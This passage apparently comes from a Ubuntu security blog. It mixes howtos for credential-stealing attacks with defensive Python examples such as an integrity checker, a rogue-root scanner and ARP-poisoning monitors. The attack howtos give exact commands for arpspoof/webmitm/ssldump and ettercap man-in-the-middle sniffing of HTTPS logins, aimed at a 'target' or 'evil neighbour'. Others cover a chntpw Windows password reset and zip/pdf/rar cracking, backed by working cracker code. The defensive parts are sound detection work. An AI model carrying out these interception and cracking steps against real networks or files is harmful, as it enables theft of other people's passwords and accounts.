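    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/status") as f:
                procs[pid] = parse_status(f.read())
            exes[pid] = os.readlink(f"/proc/{pid}/exe")
        except (OSError, KeyError, ValueError):
            continue
    return suspicious_root_processes(procs, exes, magic_group_uids(magic_group), whitelist)


if __name__ == "__main__":
    for a in scan_live():
        print(a)
```

Note the asymmetry in the sample: `su` is caught by the same rule as the unknown binary (effective UID 0, parent UID 1000) and is only let through by the whitelist, which is exactly why Ninja insists on a fine-grained whitelist rather than exempting setuid binaries wholesale.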
Filesystem Integrity:
Aide
Advanced Intrusion Detection Environment - static binary
AIDE is an intrusion detection system that detects changes to files on
the local system. It creates a database from the regular expression rules
that it finds from the config file. Once this database is initialized
it can be used to verify the integrity of the files. It has several
message digest algorithms (md5, sha1, rmd160, tiger, haval, etc.) that are
used to check the integrity of the file. More algorithms can be added
with relative ease. All of the usual file attributes can also be checked
for inconsistencies.
This package contains the statically linked binary for "normal"
systems.
You will almost certainly want to tweak the configuration file in
/etc/aide/aide.conf or drop your own config snippets into
/etc/aide/aide.conf.d.
Upstream URL: http://sourceforge.net/projects/aide
-
Integrit
A file integrity verification program
Integrit helps you determine whether an intruder has modified your
system. Without the use of integrit, a sysadmin wouldn't know if the
programs used for investigating the system are trojan horses or not.
Integrit works by creating a database that is a snapshot of the most
essential parts of the system. You put the database somewhere safe,
and then later you can use it to make sure that no one has made any
illicit modifications to your file system.
Integrit's key features are the small memory footprint, the design
with unattended use in mind, intuitive cascading rulesets for the
paths listed in the configuration file, the possibility of XML or
human-readable output, and simultaneous checks and updates.
See http://integrit.sourceforge.net/ for more information.
-
Debsums
Verify installed package files against MD5 checksums.
debsums can verify the integrity of installed package files against
MD5 checksums installed by the package, or generated from a .deb
archive.
-
Fcheck
IDS filesystem baseline integrity checker
The fcheck utility is an IDS (Intrusion Detection System)
which can be used to monitor changes to any given filesystem.
Essentially, fcheck has the ability to monitor directories, files
or complete filesystems for any additions, deletions, and modifications.
It is configurable to exclude active log files, and can be run as often
as needed from the command line or cron making it extremely difficult to
circumvent.
-
SamHain
Data integrity and host intrusion alert system
Samhain is an integrity checker and host intrusion detection system that
can be used on single hosts as well as large, UNIX-based networks.
It supports central monitoring as well as powerful (and new) stealth
features to run undetected on memory using steganography.
Main features
* Complete integrity check
+ uses cryptographic checksums of files to detect
modifications,
+ can find rogue SUID executables anywhere on disk, and
* Centralized monitoring
+ native support for logging to a central server via encrypted
and authenticated connections
* Tamper resistance
+ database and configuration files can be signed
+ logfile entries and e-mail reports are signed
+ support for stealth operation
Homepage: http://la-samhna.de/samhain/index.html
-
SleuthKit
Tools for forensics analysis
The Sleuth Kit (previously known as TASK) is a collection of UNIX-based
command line file system and media management forensic analysis tools.
The file system tools allow you to examine file systems of a suspect
computer in a non-intrusive fashion. Because the tools do not rely on
the operating system to process the file systems, deleted and hidden
content is shown.
The media management tools allow you to examine the layout of disks and
other media. The Sleuth Kit supports DOS partitions, BSD partitions
(disk labels), Mac partitions, and Sun slices (Volume Table of
Contents). With these tools, you can identify where partitions are
located and extract them so that they can be analyzed with file system
analysis tools.
When performing a complete analysis of a system, we all know that
command line tools can become tedious. The Autopsy Forensic Browser is
a graphical interface to the tools in The Sleuth Kit, which allows you
to more easily conduct an investigation. Autopsy provides case
management, image integrity, keyword searching, and other automated
operations.
The Sleuth Kit's upstream homepage can be found at
http://www.sleuthkit.org/sleuthkit/.
-
Stealth
A stealthy File Integrity Checker
The STEALTH program performs File Integrity Checks on (remote) clients. It
differs from other File Integrity Checkers by not requiring baseline
integrity data to be kept on either write-only media or in the client's file
system. In fact, clients will contain hardly any indication at all that they
are being monitored, thus improving the stealthiness of the integrity scans.
STEALTH uses standard available software to perform file integrity checks
(like find(1) and md5sum(1)). Using individualized policy files, it is highly
adaptable to the specific requirements of its clients.
In production environments STEALTH should be run from an isolated computer
(called the `STEALTH monitor'). In optimal configurations the STEALTH
monitor should be a computer not accepting incoming connections. The account
used to connect to its clients does not have to be `root': usually
read-access to the client's file system is enough to perform a full integrity
check. Instead of using `root' a more restrictive administrative or
ordinary account might offer all requirements for the desired integrity
check.
STEALTH itself must communicate with the computers it should monitor. It is
essential that this communication is secure, and STEALTH configurations will
therefore normally specify SSH as the command-shell to use to connect to its
clients. STEALTH may be configured so as to use but one SSH connection per
client, even if integrity scans are to be performed repeatedly. Apart from
this, the STEALTH monitor might be allowed to send e-mail to remote clients
system's maintainers.
STEALTH-runs itself may start randomly within specified intervals. The
resulting unpredictability of STEALTH-runs further increases STEALTH's
stealthiness.
STEALTH's acronym is expanded to `Ssh-based Trust Enforcement Acquired
through a Locally Trusted Host': the client's trust is enforced, the locally
trusted host is the STEALTH monitor.
-
TripWire
file and directory integrity checker
Tripwire is a tool that aids system administrators and users in
monitoring a designated set of files for any changes. Used with
system files on a regular (e.g., daily) basis, Tripwire can notify
system administrators of corrupted or tampered files, so damage
control measures can be taken in a timely manner.
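AIDE, integrit, fcheck, Samhain and Tripwire all share one core: snapshot the attributes and a cryptographic digest of every file, keep that database somewhere the intruder cannot reach, and later diff a fresh snapshot against it. The following is an added example for this post (none of those projects' code) that implements that core with SHA-256 and a JSON database, reporting added, removed and changed files with the attributes that changed. The directory tree, file contents and the "var/log" exclusion in `demo()` are constructed for the example.

```python
import hashlib
import json
import os
import stat
import tempfile


def file_record(path):
    """The attributes integrity checkers compare, plus a SHA-256 for regular files."""
    st = os.lstat(path)
    rec = {"mode": oct(st.st_mode), "uid": st.st_uid, "gid": st.st_gid,
           "size": st.st_size, "mtime": int(st.st_mtime)}
    if stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 16), b""):
                h.update(chunk)
        rec["sha256"] = h.hexdigest()
    elif stat.S_ISLNK(st.st_mode):
        rec["target"] = os.readlink(path)  # a retargeted symlink is a change too
    return rec


def _excluded(rel, exclude):
    return any(rel == e or rel.startswith(e.rstrip("/") + "/") for e in exclude)


def build_baseline(root, exclude=("var/log",)):
    """Walk `root`; `exclude` lists relative path prefixes to skip (active log files
    change legitimately and would otherwise drown real alerts)."""
    db = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        dirnames[:] = [d for d in dirnames
                       if not _excluded(os.path.normpath(os.path.join(rel_dir, d)), exclude)]
        for name in filenames:
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if _excluded(rel, exclude):
                continue
            try:
                db[rel] = file_record(os.path.join(dirpath, name))
            except OSError:
                continue
    return db


def save_baseline(db, path):
    with open(path, "w") as f:
        json.dump(db, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Diff two snapshots: added and removed paths, and per changed path the attributes that differ."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for rel in set(baseline) & set(current):
        keys = set(baseline[rel]) | set(current[rel])
        diffs = sorted(k for k in keys if baseline[rel].get(k) != current[rel].get(k))
        if diffs:
            changed[rel] = diffs
    return {"added": added, "removed": removed, "changed": changed}


def demo():
    """Constructed scenario in a temp dir: baseline, then modify, delete and add files, then compare."""
    root = tempfile.mkdtemp(prefix="fim-")
    os.makedirs(os.path.join(root, "bin"))
    with open(os.path.join(root, "bin", "ls"), "wb") as f:
        f.write(b"original binary")
    with open(os.path.join(root, "gone.txt"), "w") as f:
        f.write("to be removed")
    # The database lives outside the monitored tree, as the tools above all insist.
    db_path = os.path.join(tempfile.mkdtemp(prefix="fim-db-"), "baseline.json")
    save_baseline(build_baseline(root), db_path)
    with open(os.path.join(root, "bin", "ls"), "wb") as f:
        f.write(b"trojaned binary!!")
    os.remove(os.path.join(root, "gone.txt"))
    with open(os.path.join(root, "new.txt"), "w") as f:
        f.write("dropped by intruder")
    return compare(load_baseline(db_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The part the code cannot do for you is what separates a toy from Tripwire or Samhain: the baseline and the checker binary must be trusted, which means read-only media, a signed database, or a remote monitor (the Stealth approach above), and the hash must cover the checker itself. An attacker who can rewrite baseline.json has nothing to fear from a diff.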
Have anything else worth mentioning? Please leave a comment
Howto: Use arpspoof, webmitm, and ssldump to effectively sniff passwords and other info via https connections on the lan/wlan with Ubuntu Linux!
Let me show you how easy it is to sniff someone else's password/cookies via ssl/https on the lan/wlan with ubuntu linux.
We will be using Arp Spoofing/Poisoning for this attack. If you have problems with this howto, there is an alternate with ettercap here that may be a bit easier.
You can learn more about arp spoofing and poisoning here
The Attack preparation:
First let's grab the necessary packages:
sudo apt-get install dsniff ssldump
Now let's enable packet forwarding:
sudo -s
echo 1 > /proc/sys/net/ipv4/ip_forward
Let's set some iptables rules:
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
arpspoof -t "target ip(person to own)" "gateway ip(router)"
webmitm -d
ssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you do is wait for the target machine to log into google/gmail/yahoo/msn/hotmail or any other https connection, even a bank or whatever interests you and you will see the passwords pop up in the terminal.
Defense against this attack:
Please see my page on hardening the Ubuntu Linux kernel with sysctl here
It seems like this isn't working for everyone, I will be redoing this howto today, stay tuned.
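The defense section above points at kernel hardening; the other half of defending against arpspoof (the dsniff tool listed at the top of this page and the one this howto is built on) is noticing it. Here is an added example for this post, not code from dsniff or the kernel-hardening page, in the spirit of arpwatch: it reads the ARP neighbour table, remembers which MAC answered for each IP, and raises an alert when a protected address such as the gateway changes MAC or when one MAC starts answering for several IPs. The `ip -4 neigh show` output format is an assumption about an iproute2 host; the addresses and MACs in the snapshots are constructed.

```python
import re
import subprocess
import time
from collections import defaultdict

# One line of `ip -4 neigh show`: "192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE"
NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+)(?: lladdr (?P<mac>[0-9a-fA-F:]{17}))? .*?(?P<state>\w+)$"
)

# Constructed snapshots: first a healthy table, then the gateway's IP suddenly carrying the
# MAC of another host on the LAN, which is what a successful ARP poisoning run looks like.
SAMPLE_SNAPSHOTS = [
    "192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE\n"
    "192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 STALE\n"
    "192.168.1.9 dev eth0  FAILED\n",
    "192.168.1.1 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE\n"
    "192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE\n",
]


def parse_neigh(output):
    """Map ip -> mac for every entry that has a link-layer address."""
    table = {}
    for line in output.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m and m.group("mac"):
            table[m.group("ip")] = m.group("mac").lower()
    return table


def read_live_table():
    out = subprocess.run(["ip", "-4", "neigh", "show"], capture_output=True, text=True, check=True).stdout
    return parse_neigh(out)


class ArpMonitor:
    """Keeps the last MAC seen for each IP and reports the two signatures of poisoning."""

    def __init__(self, protected_ips=()):
        self.known = {}
        self.protected = set(protected_ips)

    def observe(self, table):
        alerts = []
        for ip, mac in table.items():
            old = self.known.get(ip)
            if old and old != mac:
                alerts.append({"kind": "mac_changed", "ip": ip, "old": old, "new": mac,
                               "critical": ip in self.protected})
            self.known[ip] = mac
        by_mac = defaultdict(set)
        for ip, mac in self.known.items():
            by_mac[mac].add(ip)
        for mac, ips in by_mac.items():
            if len(ips) > 1 and ips & self.protected:
                alerts.append({"kind": "duplicate_mac", "mac": mac, "ips": sorted(ips)})
        return alerts


def watch(gateway_ip, interval=5, rounds=None):
    """Poll the live table; prints alerts as they appear. rounds=None runs until interrupted."""
    mon = ArpMonitor(protected_ips={gateway_ip})
    n = 0
    while rounds is None or n < rounds:
        for a in mon.observe(read_live_table()):
            print(a)
        n += 1
        time.sleep(interval)


if __name__ == "__main__":
    mon = ArpMonitor(protected_ips={"192.168.1.1"})
    for snap in SAMPLE_SNAPSHOTS:
        print(mon.observe(parse_neigh(snap)))
```

Detection is the cheap half; the mitigation on a host you control is a static entry so the kernel ignores unsolicited replies for the gateway at all, e.g. `ip neigh replace 192.168.1.1 lladdr 00:11:22:33:44:01 nud permanent dev eth0` (placeholder addresses from the snapshots above). On a switched network the same signal is available centrally from the switch's dynamic ARP inspection logs, which see the forged replies before any host does.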
Howto: Install Metasploit 3.1 svn in Ubuntu Hardy Heron
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
This is a tool that I pentest my lan with and can be used to hack remote computers/networks or whatever. I will show you how to get this set up and installed in Ubuntu Hardy very easily:
First let's install the dependencies:
sudo apt-get install build-essential ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev irb subversion
Let's grab rubygems and install it because the ubuntu package is crap.
wget http://rubyforge.org/frs/download.php/11289/rubygems-0.9.0.tgz
tar -xvzf rubygems-0.9.0.tgz
cd rubygems-0.9.0
sudo ruby setup.rb
sudo gem install -v=1.1.6 rails
Now at last we can grab metasploit:
svn co http://metasploit.com/svn/framework3/trunk/ metasploit
Let's cd to the metasploit dir and update it; I do this before executing every time.
cd metasploit
Update Metasploit exploits/modules/payloads/packages:
svn up
Let's start up Metasploit:
./msfconsole
Learn more about metasploit here
Howto: Change Windows Administrator password in Ubuntu Hardy Heron Easily
I absolutely hate microsoft products, that's why I love breaking it. This hack is way too easy. Whatever your reason for changing any user's password, this simple howto will surely satisfy that need. The only way to prevent this currently is with full disk encryption. Here is how you change a windows password within Ubuntu Hardy Heron.
You can either use your livecd or hddsudo apt-get install chntpw
Now its installed, so lets get to work...
Ok I am assuming your using a hardy heron livecd or a Ubuntu Hardy Heron full install
You will now need to mount the windows partition read/write permission then navigate to %systemroot%/system32/config
Once your located in the config directory issue this command to change the passwordchntpw -u administrator SAM
- Prompt for password for 'administrator', if found (otherwise do nothing) use * to blank
Now reboot and login to winblows
Optionally you can skip resetting the password and just install Ubuntu
Crack your Zip Files in Ubuntu with the Ultimate Zip Cracker
Why, the hell, another zip cracker? fcrackzip isn't just any other file cracker; it is quite old (born in 1998) and I believe the last version was from 2004. It is simply mentioned here for being the first open-sourced zip cracker out there.
fcrackzip searches each zipfile given for encrypted files and tries to guess the password. All files must be encrypted with the same password; the more files you provide, the better, because each one gives the cracker another check byte to rule out wrong guesses.
fcrackzip is The Ultimate password cracker for zip archives
fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing its results with unzip. It can also crack cpmask'ed images.
Homepage: http://www.goof.com/pcg/marc/fcrackzip.html
How to install:
sudo apt-get install fcrackzip
Install with 1-click if you have apt-url installed and you are using Firefox!
Examples:
fcrackzip -c a -p aaaaaa sample.zip
checks the encrypted files in sample.zip for all lowercase 6 character passwords (aaaaaa ... abaaba ... ghfgrg ... zzzzzz).
fcrackzip --method cpmask --charset A --init AAAA test.ppm
checks the obscured image test.ppm for all four character passwords.
fcrackzip -D -p passwords.txt sample.zip
checks every password listed in the file passwords.txt.
Without -u (--use-unzip), fcrackzip only tests each guess against one check byte in the 12-byte encryption header, so roughly one wrong password in 256 is reported as a hit; add -u to have unzip verify each candidate before it is printed.
More info from the author's site here
Need to crack rar or 7z files? Check here for another tool I've unleashed.
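To make concrete what fcrackzip is doing for each guess, here is an added example (written for this page; not fcrackzip's code and not from the original post) that implements the traditional PKWARE ZipCrypto stream cipher in Python, encrypts a constructed archive member, and then cracks it the way fcrackzip does: a cheap test on the last byte of the 12-byte encryption header, followed by a full decrypt-and-CRC check that stands in for the -u/unzip verification. The password, plaintext and fixed header nonce are made up for the example; real archivers use a random nonce.

```python
import itertools
import zlib

# Byte-wise CRC-32 table (reflected polynomial 0xEDB88320) used by the key schedule.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)


def _crc32_byte(crc, b):
    return CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """Traditional PKWARE cipher (APPNOTE section 6.1): three 32-bit keys seeded
    from the password and updated with every plaintext byte."""

    def __init__(self, password):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for c in password:
            self._update(c)

    def _update(self, c):
        k = self.k
        k[0] = _crc32_byte(k[0], c)
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = _crc32_byte(k[2], k[1] >> 24)

    def _keystream_byte(self):
        t = (self.k[2] | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data):
        out = bytearray()
        for c in data:
            out.append(c ^ self._keystream_byte())
            self._update(c)
        return bytes(out)

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def encrypt_entry(password, plaintext, nonce=b"\x42" * 11):
    """Encrypt one archive member: a 12-byte header whose last byte is the high
    byte of the data CRC, then the data. The nonce is fixed here (constructed)
    so the example is reproducible; real archivers draw it at random."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = nonce + bytes([crc >> 24])
    return crc, ZipCrypto(password).encrypt(header + plaintext)


def check_password(password, crc, ciphertext, verify=True):
    """True if `password` opens the member. The header-byte test is the cheap
    filter fcrackzip relies on (about 1 wrong password in 256 passes it);
    `verify` then does the full decryption and CRC check, like -u with unzip."""
    z = ZipCrypto(password)
    header = z.decrypt(ciphertext[:12])
    if header[11] != (crc >> 24):
        return False
    if not verify:
        return True
    return zlib.crc32(z.decrypt(ciphertext[12:])) & 0xFFFFFFFF == crc


def brute_force(charset, length):
    """Every password of exactly `length` bytes over `charset` (like -c/-p)."""
    for combo in itertools.product(charset, repeat=length):
        yield bytes(combo)


def crack(candidates, crc, ciphertext):
    """First candidate that survives both the header check and the CRC check."""
    for pw in candidates:
        if check_password(pw, crc, ciphertext):
            return pw
    return None


# Constructed sample member, encrypted with the made-up password "bab".
SAMPLE_CRC, SAMPLE_CT = encrypt_entry(b"bab", b"Quarterly figures, do not distribute.")

if __name__ == "__main__":
    print(crack(brute_force(b"ab", 3), SAMPLE_CRC, SAMPLE_CT))
```

The header test costs a password setup plus twelve cipher steps, which is why fcrackzip can try millions of guesses a second; the full CRC pass is only paid for the few candidates that get past it, and supplying more files (or -u) is what drives the false-positive rate down.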
Crack Pdf Files with Ubuntu Linux!
Don't you hate it when you run into a locked-down PDF on the web? I search Google all the time for title filetype:pdf and some are locked; this is the solution! PDFCrack is a GNU/Linux (other POSIX-compatible systems should work too) tool for recovering passwords and content from PDF files. It is small, command line driven and has no external dependencies. The application is Open Source (GPL).
Features
* Supports the standard security handler (revision 2 and 3) on all known PDF-versions
* Supports cracking both owner and user passwords
* Both wordlists and brute-forcing the password are supported
* Simple permutations (currently only trying the first character as upper case)
* Save/load a running job
* Simple benchmarking
* Optimised search for the owner password when the user password is known
Install pdfcrack in Ubuntu:
sudo aptitude install pdfcrack
pdfcrack syntax:
pdfcrack -f filename [options]
pdfcrack options
-b, --bench              Perform benchmark and exit.
-c, --charset=STRING     Use the characters in STRING as charset.
-m, --maxpw=INTEGER      Stop when reaching INTEGER as password length.
-n, --minpw=INTEGER      Skip trying passwords shorter than INTEGER.
-l, --loadState=FILE     Continue from the state saved in FILE.
-o, --owner              Work with the owner password.
-p, --password=STRING    Use STRING as the user password to speed up breaking the owner password (implies -o).
-q, --quiet              Run quietly.
-s, --permutate          Try permutating the passwords (currently only supports switching the first character to uppercase).
-u, --user               Work with the user password (default).
-v, --version            Print version and exit.
-w, --wordlist=FILE      Use FILE as the source of passwords to try.
pdfcrack example:
pdfcrack -f mylocked.pdf
That brute-forces the user password; to try a wordlist instead use -w, and to go after the owner password when you already know the user password use -o together with -p.
More information on this great utility can be found at the author's site here
Lifehacker.com Has some alternative utilities and ideas for cracking pdf's here
UbuntuGeek has some information about this tool here
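The checks pdfcrack runs for the user password, the owner password, and the -p shortcut are short enough to show in full. The added Python example below (written for this page, not pdfcrack's own code) implements the standard security handler at revision 2 (40-bit RC4, following algorithms 3.2 to 3.7 of the PDF Reference), builds the /O and /U strings for a constructed document with a made-up owner password, user password, /P value and /ID, and then recovers both passwords from small wordlists. Revision 3 adds extra MD5 and RC4 rounds, longer keys and a differently computed /U, but the structure of the checks is the same.

```python
import hashlib
import struct

# Padding string from the PDF Reference, Algorithm 3.2.
PAD = bytes([0x28, 0xBF, 0x4E, 0x5E, 0x4E, 0x75, 0x8A, 0x41, 0x64, 0x00, 0x4E, 0x56,
             0xFF, 0xFA, 0x01, 0x08, 0x2E, 0x2E, 0x00, 0xB6, 0xD0, 0x68, 0x3E, 0x80,
             0x2F, 0x0C, 0xA9, 0xFE, 0x64, 0x53, 0x69, 0x7A])


def rc4(key, data):
    """Plain RC4; the standard security handler uses it for /U, /O and content."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def pad_password(pw):
    return (pw + PAD)[:32]


def compute_key(user_pw, O, P, file_id):
    """Algorithm 3.2, revision 2: 5-byte (40-bit) RC4 key from the user password."""
    md = hashlib.md5(pad_password(user_pw) + O
                     + struct.pack("<I", P & 0xFFFFFFFF) + file_id)
    return md.digest()[:5]


def owner_key(owner_pw):
    """Algorithm 3.3, revision 2: the key that encrypts the user password into /O."""
    return hashlib.md5(pad_password(owner_pw)).digest()[:5]


def build_encrypt_dict(owner_pw, user_pw, P, file_id):
    """What a producer stores: /O (Algorithm 3.3) and /U (Algorithm 3.4)."""
    O = rc4(owner_key(owner_pw), pad_password(user_pw))
    U = rc4(compute_key(user_pw, O, P, file_id), PAD)
    return O, U


def check_user_password(cand, O, U, P, file_id):
    """Algorithm 3.6: recompute /U from the candidate and compare."""
    return rc4(compute_key(cand, O, P, file_id), PAD) == U


def check_owner_password(cand, O, U, P, file_id):
    """Algorithm 3.7: RC4 is its own inverse, so decrypting /O with the candidate's
    owner key yields the (padded) user password, which is then validated."""
    user_pw = rc4(owner_key(cand), O)
    return check_user_password(user_pw, O, U, P, file_id)


def check_owner_given_user(cand, O, user_pw):
    """The shortcut behind pdfcrack's -p: with the user password known, an owner
    candidate only has to turn /O back into that padded user password."""
    return rc4(owner_key(cand), O) == pad_password(user_pw)


def crack(candidates, check):
    for cand in candidates:
        if check(cand):
            return cand
    return None


# Constructed sample document: owner "secret42", user "cat", a typical /P, made-up /ID.
P = -3904
FILE_ID = bytes(range(16))
O, U = build_encrypt_dict(b"secret42", b"cat", P, FILE_ID)

if __name__ == "__main__":
    words = [b"dog", b"cat", b"bird"]
    print(crack(words, lambda w: check_user_password(w, O, U, P, FILE_ID)))
    print(crack([b"hunter2", b"secret42"], lambda w: check_owner_given_user(w, O, b"cat")))
```

The owner check without -p costs an MD5, an RC4 over /O, another MD5 and another RC4 per guess; with the user password supplied it drops to one MD5 and one 32-byte RC4 and a comparison, which is the optimisation the feature list refers to.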
Howto: Crack Rar, 7z, and zip files with RarCrack in Ubuntu Linux
This program uses a brute force algorithm to find the correct password. You can specify which characters will be used when generating passwords.
Download RarCrack
wget http://superb-east.dl.sourceforge.net/sourceforge/rarcrack/rarcrack-0.2.tar.bz2
Install RarCrack:
tar xvjf rarcrack-0.2.tar.bz2
cd rarcrack-0.2
sudo apt-get install libxml2-dev
make ; sudo make install
Using RarCrack:
rarcrack your_encrypted_archive.ext [--threads thread_num] [--type rar|zip|7z]
Everything in [] is optional; by default rarcrack cracks with two threads and autodetects the archive type. If the detection is wrong you can specify the correct file type with the --type parameter. RarCrack currently supports a maximum of 12 threads. Once cracking has started, RarCrack prints the current status and saves it to a status file. If you want a more specific password character set, run RarCrack once to create the XML status file (about 3 seconds), then stop it.
The XML file contains the character set; if you want, you can modify this file, and when you start RarCrack again the program will use the new values.
Warning: take care when changing this file; make sure the real password doesn't contain characters outside the abc [character set] element, or it will never be found.
Know of any other rar/zip/7z cracking tools worth mentioning?
More information on rarcrack can be found here
Howto: Sniff or Hack someone’s username and password over an SSL encrypted connection with Ubuntu Linux
Do you think you're safe if you type https:// before gmail.com or paypal.com? I hope you'll think twice before you log in from a computer connected to a wireless network after reading this guide. Let's start at the beginning. Let's say you have an evil neighbour who wants your PayPal credentials. He buys himself a nice laptop with a wireless card and, if you are using WEP encryption, he cracks your WEP key (click here to see how). After cracking the key he logs into your network. Maybe you always allowed him to use your network because you thought it couldn't do any harm to your computer. You aren't sharing any folders, so what's the problem? Well, in the next few steps I'm going to describe the problem.
Guide
1. Let's assume your neighbour uses Linux to crack your WEP key. After cracking it, he installs ettercap (http://ettercap.sourceforge.net/) on his Linux system. If you want to do this at home, I would recommend you download BackTrack because it already has everything installed. If you want to install it on your own Linux distribution, download the source and build it with the following commands:
$ tar -xzvf ettercap-version.tar.gz
$ cd ettercap-version
$ ./configure
$ make
$ sudo make install
To install in Ubuntu simply click here within Firefox or:
sudo apt-get install ettercap-gtk
2. After installing, you need to uncomment some lines to enable SSL dissection. Open a terminal window and edit etter.conf as root: for the Ubuntu package it lives at /etc/etter.conf (sudo nano /etc/etter.conf); a source install puts it at /usr/local/etc/etter.conf. Scroll down using your arrow keys until you find this piece of the file:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
You need to uncomment the last two lines (remove the leading #) so they read:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
These are the rules ettercap installs and removes itself, to redirect the victim's SSL connections into its own proxy.
3. Press CTRL+O, press Enter to save the file and then press CTRL+X.
4. Start Ettercap as root (it needs raw access to the network interface) and click Sniff > Unified Sniffing, type in your wireless interface and press OK.
5. Press CTRL+S to scan for hosts.
6. Go to MITM > ARP poisoning, select "sniff remote connections" and press OK.
7. Now you (and your neighbour!) can start sniffing! Press Start > Start sniffing. Walk to another computer on your network and open up PayPal or any other site where you need to type in a username/password (Gmail, Hotmail, digg.com, etc.). All credentials will appear on the computer running Ettercap! For HTTPS sites there is a catch: ettercap has to hand the victim's browser its own certificate in place of the real one, so the browser throws a certificate warning, and the credentials are only captured if the user clicks through it.
8. When you're done, don't just close Ettercap; go to Start > Stop sniffing, and then MITM > Stop mitm attack(s), so the victims' ARP tables are restored.
But how does all this stuff work?
Look at the following scheme:
Normally when you type in a password, host 1 (your computer) sends it directly to host 2 (your modem or router). But if someone has launched Ettercap on your network, host 1 isn't sending its packets to host 2 but to the attacking host, the one running Ettercap, because its ARP table now maps host 2's IP address to the attacker's MAC address. The attacking host forwards everything on to host 2, so host 1 doesn't notice anything. Exactly the same happens with everything host 2 sends: it no longer goes directly to host 1, but first to the attacking host.
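The poisoning the guide relies on is a stream of unsolicited ARP replies, and it leaves a trace that any host on the LAN can see. The added Python example below (written for this page, not ettercap code) builds raw ARP reply frames for a constructed LAN with made-up addresses, replays the two-sided poisoning from the attacking host, and runs a small watcher that flags a known IP suddenly answering from a different MAC, which is the check tools like arpwatch perform.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Raw Ethernet + ARP frame (42 bytes), the shape arpspoof/ettercap inject."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode an ARP-over-Ethernet frame for IPv4; None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class ArpWatch:
    """Keep the IP-to-MAC bindings seen in replies; a known IP answering from a
    different MAC is the signature of the poisoning described above."""

    def __init__(self, trusted=None):
        self.bindings = dict(trusted or {})
        self.alerts = []

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None or pkt["op"] != ARP_REPLY:
            return None
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
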